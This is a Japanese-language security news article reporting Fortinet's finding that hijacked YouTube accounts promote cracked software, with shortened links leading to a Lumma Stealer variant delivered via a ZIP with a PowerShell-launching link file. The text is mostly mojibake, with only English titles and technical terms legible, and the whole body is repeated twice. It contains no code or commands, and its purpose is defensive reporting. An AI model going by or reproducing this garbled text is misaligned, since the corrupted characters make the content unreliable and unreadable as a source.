YouTube¤Ç¹¤¬¤ë¥Þ¥ë¥¦¥§¥¢¤Ë·Ù²ü¤ò¡¢¥À¥¦¥ó¥í¡¼¥É¤ÏÁý²Ã¤Î°ìÅÓ
Fortinet¤Ï1·î8Æü(Êƹñ»þ´Ö)¡¢¡ÖDeceptive Cracked Software Spreads Lumma Variant on YouTube¡ÃFortiGuard Labs¡×¤Ë¤ª¤¤¤Æ¡¢YouTube¤ò°ÍѤ·¤Æ¾ðÊóÀà¼è¥Þ¥ë¥¦¥§¥¢¡ÖLumma Stealer¡×¤Î°¡¼ï¤òÇÛÉÛ¤¹¤ë¶¼°Ò¥°¥ë¡¼¥×¤òȯ¸«¤·¤¿¤ÈÅÁ¤¨¤¿¡£
Deceptive Cracked Software Spreads Lumma Variant on YouTube¡ÃFortiGuard Labs
¡ûÆ°²è¤Ë°°Õ¤¢¤ë¥Õ¥¡¥¤¥ë¤Ø¤Îû½ÌURL¤¬Ëä¤á¹þ¤Þ¤ì¤Æ¤¤¤ë
¶¼°Ò¥°¥ë¡¼¥×¤ÏYouTube¥¢¥«¥¦¥ó¥È¤ò¿¯³²¤·¡¢Â¾¿Í¤Î¥¢¥«¥¦¥ó¥È¤Ç¥¯¥é¥Ã¥¯¤µ¤ì¤¿¥½¥Õ¥È¥¦¥§¥¢¤òÀëÅÁ¤¹¤ëÆ°²è¤ò¥¢¥Ã¥×¥í¡¼¥É¤¹¤ë¤³¤È¤¬³Îǧ¤µ¤ì¤Æ¤¤¤ë¡£¤³¤ÎÆ°²è¤Ë¤Ï°°Õ¤¢¤ë¥Õ¥¡¥¤¥ë¤Ø¤Îû½ÌURL¤¬Ëä¤á¹þ¤Þ¤ì¤Æ¤ª¤ê¡¢Æ°²è¤ò»ëÄ°¤·¤¿¥æ¡¼¥¶¡¼¤òͶƳ¤¹¤ë¡£
û½ÌURL¤Î¥ê¥ó¥¯Àè¤ÏGitHub¤äMediaFire¤Ê¤É¤Î¥ª¡¼¥×¥ó¥½¡¼¥¹¥×¥é¥Ã¥È¥Õ¥©¡¼¥à¤¬»ÈÍѤµ¤ì¤Æ¤ª¤ê¡¢¥Õ¥£¥ë¥¿¤Ë¤è¤ëÊݸî¤ò²óÈò¤¹¤ëÌÜŪ¤¬¤¢¤ë¤È¸«¤é¤ì¤ë¡£Fortinet¤Ë¤è¤ë¤È¡¢º£²ó³Îǧ¤µ¤ì¤¿Æ°²è¤Ïº£Ç¯¤Ï¤¸¤á¤Ë¥¢¥Ã¥×¥í¡¼¥É¤µ¤ì¤¿¤â¤Î¤À¤¬¡¢¥ê¥ó¥¯Àè¤Î°°Õ¤Î¤¢¤ë¥Õ¥¡¥¤¥ë¤ÏÄê´üŪ¤Ë¹¹¿·¤µ¤ì¤Æ¤ª¤ê¡¢¥À¥¦¥ó¥í¡¼¥É¿ô¤ÏÁý²Ã¤·Â³¤±¤Æ¤¤¤ë¤È¤·¤Æ·Ù²ü¤ò¸Æ¤Ó¤«¤±¤Æ¤¤¤ë¡£
¹¶·â¤Îή¤ì¡¡°úÍÑ¡§Fortinet
¡û°°Õ¤Î¤¢¤ë¥Õ¥¡¥¤¥ë¤Î¼ÂÂÎ
¤³¤Î°°Õ¤Î¤¢¤ë¥Õ¥¡¥¤¥ë¤ÏZIP¥Õ¥¡¥¤¥ë·Á¼°¤Ç¡¢PowerShell¤ò»ÈÍѤ·¤Æ°°Õ¤Î¤¢¤ë¥¤¥ó¥¹¥È¡¼¥ë¥Õ¥¡¥¤¥ë¤ò¥À¥¦¥ó¥í¡¼¥É¤¹¤ë¥ê¥ó¥¯¥Õ¥¡¥¤¥ë¤òÆâÊñ¤·¤Æ¤¤¤ë¡£¤³¤Î¥ê¥ó¥¯¥Õ¥¡¥¤¥ë¤ò³«¤¯¤È¡¢ºÇ½ªÅª¤Ë¾ðÊóÀà¼è¥Þ¥ë¥¦¥§¥¢¤¬¥¤¥ó¥¹¥È¡¼¥ë¤µ¤ì¤ë¡£¥¤¥ó¥¹¥È¡¼¥ë¤Î²áÄø¤ÇŸ³«¤µ¤ì¤ë¥Þ¥ë¥¦¥§¥¢¥í¡¼¥À¤Ë¤Ï´Ä¶¥Á¥§¥Ã¥¯¡¢¥¢¥ó¥Á¥¦¥¤¥ë¥¹¥½¥Õ¥È¥¦¥§¥¢Âкö¡¢¥Ç¥Ð¥Ã¥°Âкö¤¬´Þ¤Þ¤ì¤Æ¤ª¤ê¡¢Ê¬ÀϤò˸³²¤¹¤ëµ¡Ç½¤¬³Îǧ¤Ç¤¤ë¤È¤¤¤¦¡£
ºÇ½ªÅª¤Ë¥¤¥ó¥¹¥È¡¼¥ë¤µ¤ì¤ëLumma Stealer¤Î°¡¼ï¤Ï¥·¥¹¥Æ¥à¥Ç¡¼¥¿¡¢¥Ö¥é¥¦¥¶¡¢°Å¹æ»ñ»º¤Î¥¦¥©¥ì¥Ã¥È¤Ê¤É¡¢¤µ¤Þ¤¶¤Þ¤Ê¾ðÊó¤òÀà¼è¤¹¤ë²ÄǽÀ¤¬¤¢¤ë¡£¤Þ¤¿¡¢¥³¥Þ¥ó¥É¡õ¥³¥ó¥È¥í¡¼¥ë(C2: Command and Control)¥µ¡¼¥Ð¤ÈÀܳ¤ò³ÎΩ¤·¡¢HTTPS¥×¥í¥È¥³¥ë¤ò²ð¤·¤Æ¥µ¡¼¥Ð¤«¤é¤ÎÍ×µá¤ò½èÍý¤¹¤ëµ¡Ç½¤äÀà¼è¤·¤¿¾ðÊó¤òÁ÷¿®¤¹¤ëµ¡Ç½¤ò»ý¤Ä¡£
Fortinet¤Ï¤³¤Î¤è¤¦¤Ê¹¶·â¤ò²óÈò¤¹¤ë¤¿¤á¤Ë¡¢ÉÔ¿³¤Ê¥½¥Õ¥È¥¦¥§¥¢¤ËÃí°Õ¤·¡¢¿®Íê¤Ç¤¤ë¸ø¼°¥µ¥¤¥È¤«¤éÇÛÉÛ¤µ¤ì¤ëÀµµ¬¤Î¥½¥Õ¥È¥¦¥§¥¢°Ê³°¤Ï»ÈÍѤ·¤Ê¤¤¤³¤È¤ò¿ä¾©¤·¤Æ¤¤¤ë¡£¤Þ¤¿¡¢º£²ó¤ÎʬÀϤˤª¤¤¤ÆȽÌÀ¤·¤¿¥»¥¥å¥ê¥Æ¥£¿¯³²¥¤¥ó¥¸¥±¡¼¥¿(IoC: Indicator of Compromise)¤ò¸ø³«¤·¤Æ¤ª¤ê¡¢É¬Íפ˱þ¤¸¤Æ³èÍѤ¹¤ë¤³¤È¤¬Ë¾¤Þ¤ì¤Æ¤¤¤ë¡£
Deceptive Cracked Software Spreads Lumma Variant on YouTube¡ÃFortiGuard Labs
¶¼°Ò¥°¥ë¡¼¥×¤ÏYouTube¥¢¥«¥¦¥ó¥È¤ò¿¯³²¤·¡¢Â¾¿Í¤Î¥¢¥«¥¦¥ó¥È¤Ç¥¯¥é¥Ã¥¯¤µ¤ì¤¿¥½¥Õ¥È¥¦¥§¥¢¤òÀëÅÁ¤¹¤ëÆ°²è¤ò¥¢¥Ã¥×¥í¡¼¥É¤¹¤ë¤³¤È¤¬³Îǧ¤µ¤ì¤Æ¤¤¤ë¡£¤³¤ÎÆ°²è¤Ë¤Ï°°Õ¤¢¤ë¥Õ¥¡¥¤¥ë¤Ø¤Îû½ÌURL¤¬Ëä¤á¹þ¤Þ¤ì¤Æ¤ª¤ê¡¢Æ°²è¤ò»ëÄ°¤·¤¿¥æ¡¼¥¶¡¼¤òͶƳ¤¹¤ë¡£
û½ÌURL¤Î¥ê¥ó¥¯Àè¤ÏGitHub¤äMediaFire¤Ê¤É¤Î¥ª¡¼¥×¥ó¥½¡¼¥¹¥×¥é¥Ã¥È¥Õ¥©¡¼¥à¤¬»ÈÍѤµ¤ì¤Æ¤ª¤ê¡¢¥Õ¥£¥ë¥¿¤Ë¤è¤ëÊݸî¤ò²óÈò¤¹¤ëÌÜŪ¤¬¤¢¤ë¤È¸«¤é¤ì¤ë¡£Fortinet¤Ë¤è¤ë¤È¡¢º£²ó³Îǧ¤µ¤ì¤¿Æ°²è¤Ïº£Ç¯¤Ï¤¸¤á¤Ë¥¢¥Ã¥×¥í¡¼¥É¤µ¤ì¤¿¤â¤Î¤À¤¬¡¢¥ê¥ó¥¯Àè¤Î°°Õ¤Î¤¢¤ë¥Õ¥¡¥¤¥ë¤ÏÄê´üŪ¤Ë¹¹¿·¤µ¤ì¤Æ¤ª¤ê¡¢¥À¥¦¥ó¥í¡¼¥É¿ô¤ÏÁý²Ã¤·Â³¤±¤Æ¤¤¤ë¤È¤·¤Æ·Ù²ü¤ò¸Æ¤Ó¤«¤±¤Æ¤¤¤ë¡£
¹¶·â¤Îή¤ì¡¡°úÍÑ¡§Fortinet
¡û°°Õ¤Î¤¢¤ë¥Õ¥¡¥¤¥ë¤Î¼ÂÂÎ
¤³¤Î°°Õ¤Î¤¢¤ë¥Õ¥¡¥¤¥ë¤ÏZIP¥Õ¥¡¥¤¥ë·Á¼°¤Ç¡¢PowerShell¤ò»ÈÍѤ·¤Æ°°Õ¤Î¤¢¤ë¥¤¥ó¥¹¥È¡¼¥ë¥Õ¥¡¥¤¥ë¤ò¥À¥¦¥ó¥í¡¼¥É¤¹¤ë¥ê¥ó¥¯¥Õ¥¡¥¤¥ë¤òÆâÊñ¤·¤Æ¤¤¤ë¡£¤³¤Î¥ê¥ó¥¯¥Õ¥¡¥¤¥ë¤ò³«¤¯¤È¡¢ºÇ½ªÅª¤Ë¾ðÊóÀà¼è¥Þ¥ë¥¦¥§¥¢¤¬¥¤¥ó¥¹¥È¡¼¥ë¤µ¤ì¤ë¡£¥¤¥ó¥¹¥È¡¼¥ë¤Î²áÄø¤ÇŸ³«¤µ¤ì¤ë¥Þ¥ë¥¦¥§¥¢¥í¡¼¥À¤Ë¤Ï´Ä¶¥Á¥§¥Ã¥¯¡¢¥¢¥ó¥Á¥¦¥¤¥ë¥¹¥½¥Õ¥È¥¦¥§¥¢Âкö¡¢¥Ç¥Ð¥Ã¥°Âкö¤¬´Þ¤Þ¤ì¤Æ¤ª¤ê¡¢Ê¬ÀϤò˸³²¤¹¤ëµ¡Ç½¤¬³Îǧ¤Ç¤¤ë¤È¤¤¤¦¡£
ºÇ½ªÅª¤Ë¥¤¥ó¥¹¥È¡¼¥ë¤µ¤ì¤ëLumma Stealer¤Î°¡¼ï¤Ï¥·¥¹¥Æ¥à¥Ç¡¼¥¿¡¢¥Ö¥é¥¦¥¶¡¢°Å¹æ»ñ»º¤Î¥¦¥©¥ì¥Ã¥È¤Ê¤É¡¢¤µ¤Þ¤¶¤Þ¤Ê¾ðÊó¤òÀà¼è¤¹¤ë²ÄǽÀ¤¬¤¢¤ë¡£¤Þ¤¿¡¢¥³¥Þ¥ó¥É¡õ¥³¥ó¥È¥í¡¼¥ë(C2: Command and Control)¥µ¡¼¥Ð¤ÈÀܳ¤ò³ÎΩ¤·¡¢HTTPS¥×¥í¥È¥³¥ë¤ò²ð¤·¤Æ¥µ¡¼¥Ð¤«¤é¤ÎÍ×µá¤ò½èÍý¤¹¤ëµ¡Ç½¤äÀà¼è¤·¤¿¾ðÊó¤òÁ÷¿®¤¹¤ëµ¡Ç½¤ò»ý¤Ä¡£
Fortinet¤Ï¤³¤Î¤è¤¦¤Ê¹¶·â¤ò²óÈò¤¹¤ë¤¿¤á¤Ë¡¢ÉÔ¿³¤Ê¥½¥Õ¥È¥¦¥§¥¢¤ËÃí°Õ¤·¡¢¿®Íê¤Ç¤¤ë¸ø¼°¥µ¥¤¥È¤«¤éÇÛÉÛ¤µ¤ì¤ëÀµµ¬¤Î¥½¥Õ¥È¥¦¥§¥¢°Ê³°¤Ï»ÈÍѤ·¤Ê¤¤¤³¤È¤ò¿ä¾©¤·¤Æ¤¤¤ë¡£¤Þ¤¿¡¢º£²ó¤ÎʬÀϤˤª¤¤¤ÆȽÌÀ¤·¤¿¥»¥¥å¥ê¥Æ¥£¿¯³²¥¤¥ó¥¸¥±¡¼¥¿(IoC: Indicator of Compromise)¤ò¸ø³«¤·¤Æ¤ª¤ê¡¢É¬Íפ˱þ¤¸¤Æ³èÍѤ¹¤ë¤³¤È¤¬Ë¾¤Þ¤ì¤Æ¤¤¤ë¡£